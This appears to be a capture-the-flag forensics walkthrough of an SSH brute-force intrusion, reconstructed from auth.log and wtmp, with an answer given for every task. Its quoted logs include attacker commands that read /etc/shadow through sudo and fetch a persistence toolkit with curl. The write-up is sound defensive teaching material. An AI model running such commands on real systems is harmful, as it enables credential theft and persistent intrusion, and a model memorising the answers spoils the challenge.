brutus

Released2024-04-04
Retired2024-04-04
AuthorCyberJunkie
ctf sherlock very easy linux

Scenario

In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We’ll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.

Task 01

Question: Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?

The available auth.log shows a brute force attack targeting various SSH users. Within the logged period (from 06:18:01 to 06:41:01), there are 48 failed login attempts from the same IP address on the users admin, backup, server_adm, svc_account, and root.

Answer: 65.2.161.68

Task 02

Question: The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?

After 3 failed attempts, at 06:31:40 the user root was successfully logged in automatically from the IP known from Task 01. Since this is only a brute force scanner, the session was immediately closed afterward, and the attacker was informed of the successful username and password combination.

Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.

[...]

Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Received disconnect from 65.2.161.68 port 34782:11: Bye Bye
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Disconnected from user root 65.2.161.68 port 34782
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session closed for user root
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: Session 34 logged out. Waiting for processes to exit.

Answer: root

Task 03

Question: Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?

The wtmp file records all login and logout activities. Using the last command, the provided artifact can be read to determine the sought-after timestamp.

$ last -f wtmp --time-format iso
cyberjun pts/1        65.2.161.68      2024-03-06T07:37:35+01:00   gone - no logout
root     pts/1        65.2.161.68      2024-03-06T07:32:45+01:00 - 2024-03-06T07:37:24+01:00  (00:04)
root     pts/0        203.101.190.9    2024-03-06T07:19:55+01:00   gone - no logout
reboot   system boot  6.2.0-1018-aws   2024-03-06T07:17:15+01:00   still running
root     pts/1        203.101.190.9    2024-02-11T11:54:27+01:00 - 2024-02-11T12:08:04+01:00  (00:13)
root     pts/1        203.101.190.9    2024-02-11T11:41:11+01:00 - 2024-02-11T11:41:46+01:00  (00:00)
root     pts/0        203.101.190.9    2024-02-11T11:33:49+01:00 - 2024-02-11T12:08:04+01:00  (00:34)
root     pts/0        203.101.190.9    2024-01-25T12:15:40+01:00 - 2024-01-25T13:34:34+01:00  (01:18)
ubuntu   pts/0        203.101.190.9    2024-01-25T12:13:58+01:00 - 2024-01-25T12:15:12+01:00  (00:01)
reboot   system boot  6.2.0-1017-aws   2024-01-25T12:12:17+01:00 - 2024-02-11T12:09:18+01:00 (16+23:57)

wtmp begins 2024-01-25T12:12:17+01:00

Answer: 2024-03-06 06:32:45

Task 04

Question: SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?

After the attacker’s automated login at 06:31:40 from Task 02, the attacker returns and uses the discovered login credentials for another access from the known IP. This SSH session is assigned the session number 37.

Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.

Answer: 37

Task 05

Question: The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

Shortly after the attacker’s successful login, auth.log shows the creation of a new user at 06:34:18 with UID=1002, GID=1002. This user is subsequently added to the sudo group.

Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1

[...]

Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'

Answer: cyberjunkie

Task 06

Question: What is the MITRE ATT&CK sub-technique ID used for persistence?

The attacker created a local account (cyberjunkie) using the useradd command to maintain persistent access to the system. This persistence technique corresponds to the MITRE ATT&CK® Framework ID T1136.001.

Answer: T1136.001

Task 07

Question: How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)

According to Task 03, the attacker logged in at 06:32:45, and the logout is also recorded in the auth.log. From this, the session duration can be determined.

$ printf "%s\n" $(( $(date -d "06:37:24" "+%s") - $(date -d "06:32:45" "+%s") ))
279

Answer: 279

Task 08

Question: The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

The newly created user logged in at 06:37:34 and shortly after, at 06:39:38, used the newly assigned sudo privileges to download a Linux persistence toolkit (linper) using curl.

Mar  6 06:37:34 ip-172-31-35-28 systemd-logind[411]: New session 49 of user cyberjunkie.
Mar  6 06:37:34 ip-172-31-35-28 systemd: pam_unix(systemd-user:session): session opened for user cyberjunkie(uid=1002) by (uid=0)
Mar  6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
Mar  6 06:37:57 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)
Mar  6 06:37:57 ip-172-31-35-28 sudo: pam_unix(sudo:session): session closed for user root

[...]

Mar  6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh
Mar  6 06:39:38 ip-172-31-35-28 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by cyberjunkie(uid=1002)

Answer: /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh